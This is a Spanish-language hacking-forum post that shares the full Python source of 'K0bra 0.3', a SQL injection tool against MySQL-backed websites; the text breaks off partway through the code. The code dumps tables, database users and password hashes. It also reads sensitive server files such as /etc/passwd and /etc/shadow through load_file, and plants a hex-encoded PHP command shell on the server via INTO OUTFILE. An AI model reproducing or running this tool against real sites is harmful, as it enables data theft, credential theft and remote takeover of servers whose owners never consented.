elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Python (Moderador: Danielㅤ)
| | |-+  [Python] K0bra 0.3		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Python] K0bra 0.3  (Leído 2,216 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Python] K0bra 0.3
« en: 3 Diciembre 2011, 16:35 pm »
Un completo scanner SQLI hecho en python

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
  • Manejo de control+c
Código
  1. #!usr/bin/python
  2. #k0bra 0.3 (C) Doddy Hackman 2011
  3.  
  4. import os,sys,urllib2,re,binascii
  5. from urlparse import urlparse
  6.  
  7. files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]
  8.  
  9. def installer():
  10.  try:
  11.   os.mkdir("logs",0777)
  12.  except:
  13.   pass
  14.  
  15. def clean():
  16.  if sys.platform=="win32":
  17.   os.system("cls")
  18.  else:
  19.   os.system("clear")
  20.  
  21. def savefile(name,text):
  22.  file = open(name,"a")
  23.  file.write("\n"+text)
  24.  file.close()
  25.  
  26. def gethost(test):
  27.  return urlparse(test).netloc
  28.  
  29. def header() : 
  30.  print ""
  31.  print ""
  32.  print " @      @@   @   "          
  33.  print "@@     @  @ @@      "       
  34.  print " @ @@  @  @  @ @   @ @ @@@ "
  35.  print " @ @   @  @  @@ @ @@@ @  @ "
  36.  print " @@    @  @  @  @  @   @@@ "
  37.  print " @ @   @  @  @  @  @  @  @ "
  38.  print "@@@ @   @@   @@@  @@@ @@@@@"
  39.  print ""
  40.  print ""
  41.  
  42. def copyright() : 
  43.  print "\n\n(C) Doddy Hackman 2010\n"
  44.  
  45. def show() :
  46.  print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  47.  
  48. def toma(web) :
  49.  nave = urllib2.Request(web)
  50.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  51.  op = urllib2.build_opener()
  52.  return op.open(nave).read()
  53.  
  54. def bypass(bypass): 
  55.  if bypass == "--":
  56.   return("+","--")
  57.  elif bypass == "/*":
  58.   return("/**/","/**/")
  59.  else: 
  60.   return("+","--")
  61.  
  62. def reiniciar():
  63.  copyright()
  64.  raw_input()
  65.  sta()
  66.  
  67. def dumper(web,passx,table,col1,col2):
  68.  
  69.  pass1,pass2 = bypass(passx)
  70.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  71.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  72.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  73.  print "\n\n[+] Searching values\n\n"
  74.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  75.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  76.   numbers = numbers[0]
  77.   savefile("logs/"+gethost(web)+".txt","")
  78.   savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
  79.   print "[+] Values Found : ",numbers,"\n"	
  80.   for counter in range(0,int(numbers)):
  81.    code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)	
  82.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  83.     c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  84.     c1 = c1[0]
  85.     c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  86.     c2 = c2[0]
  87.     print "["+col1+"] : "+c1
  88.     print "["+col2+"] : "+c2+"\n"
  89.     savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
  90.     savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
  91.  else:
  92.   print "[-] Not Found\n"
  93.  
  94. def mysqluser(web,passx):
  95.  pass1,pass2 = bypass(passx)
  96.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  97.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  98.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  99.  print "\n\n[+] Searching mysql.user\n\n"
  100.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  101.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  102.   numbers = numbers[0]
  103.   print "[+] mysql.user : ON"
  104.   savefile("logs/"+gethost(web)+".txt","")
  105.   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  106.   savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  107.   print "[+] Users Found : ",numbers,"\n"	
  108.   for counter in range(0,int(numbers)):
  109.    code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  110.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  111.     host = re.findall("K0BRA(.*?)K0BRA",code2)
  112.     host = host[0]
  113.     user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  114.     user = user[0]
  115.     passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  116.     passw = passw[0]
  117.     savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
  118.     savefile("logs/"+gethost(web)+".txt","[User] : "+user)
  119.     savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
  120.     print "[Host] : "+host
  121.     print "[User] : "+user
  122.     print "[Pass] : "+passw+"\n"    
  123.  else:
  124.   print "[-] Not Found\n" 
  125.  
  126.  
  127. def showcolumnsdb(web,db,table,passx):
  128.  db2 = db 
  129.  table2 = table
  130.  db = "0x"+str(binascii.hexlify(db))
  131.  table = "0x"+str(binascii.hexlify(table))
  132.  pass1,pass2 = bypass(passx)
  133.  savefile("logs/"+gethost(web)+".txt","")
  134.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  135.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  136.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)	
  137.  print "\n\n[+] Searching columns in DB\n\n"
  138.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  139.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  140.   numbers = numbers[0]
  141.   print "[+] information_schema : ON"
  142.   print "[+] Columns Found : ",numbers,"\n"	
  143.   for counter in range(0,int(numbers)):
  144.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  145.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  146.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  147.     column = column[0]
  148.     savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
  149.     print "[Column Found] : "+column
  150.  else:
  151.   print "[-] Not Found\n"
  152.  
  153.  
  154. def showtablesdb(web,db,passx):
  155.  db2 = db
  156.  db = "0x"+str(binascii.hexlify(db))
  157.  pass1,pass2 = bypass(passx)
  158.  savefile("logs/"+gethost(web)+".txt","")
  159.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  160.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  161.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)	
  162.  print "\n\n[+] Searching tables in DB\n\n"
  163.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  164.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  165.   numbers = numbers[0]
  166.   print "[+] information_schema : ON"
  167.   print "[+] Tables Found : ",numbers,"\n"	
  168.   for counter in range(0,int(numbers)):
  169.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  170.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  171.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  172.     table = table[0]
  173.     print "[Table Found] : "+table
  174.     savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
  175.  else:
  176.   print "[-] Not Found\n"
  177.  
  178. def showtables(web,passx):
  179.  pass1,pass2 = bypass(passx)
  180.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  181.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  182.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  183.  print "\n\n[+] Searching tables\n\n"
  184.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  185.   savefile("logs/"+gethost(web)+".txt","")
  186.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  187.   numbers = numbers[0]
  188.   print "[+] information_schema : ON"
  189.   print "[+] Tables Found : ",numbers,"\n"	
  190.   for counter in range(17,int(numbers)):
  191.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  192.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  193.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  194.     table = table[0]
  195.     print "[Table Found] : "+table
  196.     savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
  197.  else:
  198.   print "[-] Not Found\n"
  199.  
  200. def showcolumns(tabla,web,passx):
  201.  pass1,pass2 = bypass(passx)
  202.  tabla2 = tabla
  203.  tabla = "0x"+str(binascii.hexlify(tabla))
  204.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  205.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  206.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  207.  print "\n\n[+] Searching columns\n\n"
  208.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  209.   savefile("logs/"+gethost(web)+".txt","")
  210.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  211.   numbers = numbers[0]
  212.   print "[+] information_schema : ON"
  213.   print "[+] Columns Found : ",numbers,"\n"	
  214.   for counter in range(0,int(numbers)):
  215.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  216.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  217.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  218.     column = column[0]
  219.     print "[Column Found in table "+tabla2+"] : "+column
  220.     savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
  221.  else:
  222.   print "[-] Not Found\n"
  223.  
  224.  
  225. def showdbs(web,passx):
  226.  pass1,pass2 = bypass(passx)
  227.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  228.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  229.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  230.  print "\n\n[+] Searching DBS\n\n"
  231.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  232.   savefile("logs/"+gethost(web)+".txt","")
  233.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  234.   numbers = numbers[0]
  235.   print "[+] information_schema : ON"
  236.   print "[+] DBS Found : ",numbers,"\n"	
  237.   for counter in range(0,int(numbers)):
  238.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  239.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  240.     db = re.findall("K0BRA(.*?)K0BRA",code2)
  241.     db = db[0]
  242.     print "[DB Found] : "+db
  243.     savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
  244.  else:
  245.   print "[-] Not Found\n"
  246.  
  247. def men():
  248.  print "\n[+] Press any key to continue\n"
  249.  raw_input()    
  250.  menu(page,bypass)
  251.  
  252. def fuzz(web,bypassx):
  253.  print "\n[+] Fuzzing files with load_file()\n"
  254.  pass1,pass2 = bypass(bypassx)
  255.  for archivos in files: 
  256.   nombre = archivos
  257.   file = "0x"+str(binascii.hexlify(archivos))
  258.   web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
  259.  
  260.   code = toma(web1)
  261.  
  262.   if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  263.    algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  264.    print "\n[File Found] : ",nombre
  265.    print "\n[Source Start]\n"
  266.    print algo[0]
  267.    print "\n[Source End]"
  268.    savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  269.    savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  270.    savefile("logs/"+gethost(web)+".txt",algo[0])
  271.    savefile("logs/"+gethost(web)+".txt","\n[Source End]")
  272.  print "\n[+] Finished\n"
  273.  
  274. def fuzzfile(web,bypassx):
  275.  pass1,pass2 = bypass(bypassx)
  276.  archivos = raw_input("\n[File To load] : ")
  277.  nombre = archivos
  278.  file = "0x"+str(binascii.hexlify(archivos))
  279.  web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
  280.  
  281.  code = toma(web1)
  282.  
  283.  if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  284.   algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  285.   print "\n\n[File Found] : ",nombre
  286.   print "\n[Source Start]\n"
  287.   print algo[0]
  288.   print "\n[Source End]"
  289.   savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  290.   savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  291.   savefile("logs/"+gethost(web)+".txt",algo[0])
  292.   savefile("logs/"+gethost(web)+".txt","\n[Source End]")
  293.  else:
  294.   print "\n\n[-] Error"
  295.  
  296. def into(web,passx):
  297.  pass1,pass2 = bypass(passx)
  298.  dira = raw_input("\n\n[Full Source Discloure] : ")
  299.  diro = raw_input("\n[Directory to test] : ")
  300.  
  301.  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  302.  lugar = dira+"/cmd.php"
  303.  lugardos = diro+"/cmd.php"
  304.  webtest = "http://"+gethost(web)+lugardos
  305.  web1 = re.sub("hackman",linea,web)
  306.  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  307.  toma(formandoweb)
  308.  code = toma(webtest)
  309.  if (re.findall("Mini Shell By Doddy",code)):
  310.   print "\n\n[shell up] : "+webtest
  311.   savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
  312.  else:
  313.   print "\n\n[-] Error"
  314.  
  315.  
  316. def menu(page,bypass):
  317.  clean()
  318.  header()
  319.  print "\n[+] Target : ",page,"\n"
  320.  print "\n[information_schema]\n"
  321.  print "1 - Show tables"
  322.  print "2 - Show columns of the a table"
  323.  print "3 - Show databases"
  324.  print "4 - Show tables from the a DB"
  325.  print "5 - Show columns from the a table of the DB"
  326.  print "\n[mysql.user]\n"
  327.  print "6 - Show users"
  328.  print "\n[Others]\n"
  329.  print "7 - Show details"
  330.  print "8 - Dump data" 
  331.  print "9 - Fuzz Files with load_file"
  332.  print "10 - Load files with load_file"
  333.  print "11 - Create Shell"
  334.  print "12 - Show log"
  335.  print "13 - Change target"
  336.  print "14 - Exit\n\n"
  337.  
  338.  
  339.  try:
  340.  
  341.   op = input("[Option] : ")
  342.  
  343.   if op == 1: 
  344.    showtables(page,bypass)
  345.    men()
  346.   elif op == 2:
  347.    table = raw_input("\n\n[Table] : ")
  348.    showcolumns(table,page,bypass)
  349.    men()
  350.   elif op == 3:
  351.    showdbs(page,bypass)
  352.    men()
  353.   elif op == 4:
  354.    db = raw_input("\n\n[DB] : ")
  355.    showtablesdb(page,db,bypass)
  356.    men()
  357.   elif op == 5:
  358.    db = raw_input("\n\n[DB] : ")
  359.    table = raw_input("\n\n[Table] : ")
  360.    showcolumnsdb(page,db,table,bypass)
  361.    men()
  362.   elif op == 6:
  363.    mysqluser(page,bypass)
  364.    men()
  365.   elif op == 7:
  366.    more(page,bypass)
  367.    men()	
  368.   elif op == 8:
  369.  
  370.    table = raw_input("\n\n[Table] : ")
  371.    col1 = raw_input("\n\n[Column 1] : ")
  372.    col2 = raw_input("\n\n[Column 2] : ")
  373.    dumper(page,bypass,table,col1,col2)
  374.    men()
  375.  
  376.   elif op == 9:
  377.    fuzz(page,bypass) 
  378.    men()
  379.   elif op == 10:
  380.    fuzzfile(page,bypass)
  381.    men()	
  382.   elif op == 11:
  383.    into(page,bypass)
  384.    men()
  385.   elif op == 12:
  386.    os.system("start logs/"+gethost(page)+".txt")
  387.    menu(page,bypass)
  388.   elif op == 13:
  389.    sta()
  390.   elif op == 14:
  391.    sys.exit(1)  
  392.   else:
  393.    menu(page,bypass)
  394.  except:
  395.   menu(page,bypass)
  396.  
  397. def more(web,passx):
  398.  pass1,pass2 = bypass(passx)
  399.  otraweb = web
  400.  print "\n[+] Searching more data\n"
  401.  hextest = "0x2f6574632f706173737764"
  402.  web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  403.  web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
  404.  code0 = toma(web1+pass2)
  405.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  406.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  407.   datar = re.split("K0BRA",datax[0])
  408.   savefile("logs/"+gethost(web)+".txt","")
  409.   print "[+] Username :",datar[1]
  410.   print "[+] Database :",datar[2]
  411.   print "[+] Version :",datar[3],"\n"
  412.   savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  413.   savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  414.   savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
  415.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  416.  if (re.findall("K0BRA",code1)):
  417.    print "[+] mysql.user : on" 
  418.    savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
  419.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  420.  if (re.findall("K0BRA",code2)):
  421.    print "[+] information_schema.tables : on"
  422.    savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
  423.  codetres = toma(web2)
  424.  if (re.findall("ERTOR854",codetres)):
  425.   print "[+] load_file() : on"
  426.   savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")
  427.  
  428. def findlength(web,passx): 
  429.  pass1,pass2 = bypass(passx) 
  430.  print "\n[+] Finding columns length"
  431.  number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  432.  for te in range(2,30):
  433.   number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  434.   code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  435.   if (re.findall("K0BRA(.*?)K0BRA",code)):
  436.    numbers = re.findall("K0BRA(.*?)K0BRA",code)	
  437.    print "[+] Column length :",te
  438.    print "[+] Numbers",numbers,"print data"
  439.    sql = ""
  440.    tex = te + 1
  441.    for sqlix in range(2,tex):
  442.     sql = str(sql)+","+str(sqlix)
  443.     sqli  = str(1)+sql
  444.    sqla = re.sub(numbers[0],"hackman",sqli)
  445.    savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
  446.    menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  447.  print "[-] Length dont found\n"
  448.  reiniciar()
  449.  
  450. def scan(web,passx):
  451.  pass1,pass2 = bypass(passx) 
  452.  print "\n\n[+] Testing vulnerability"
  453.  code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
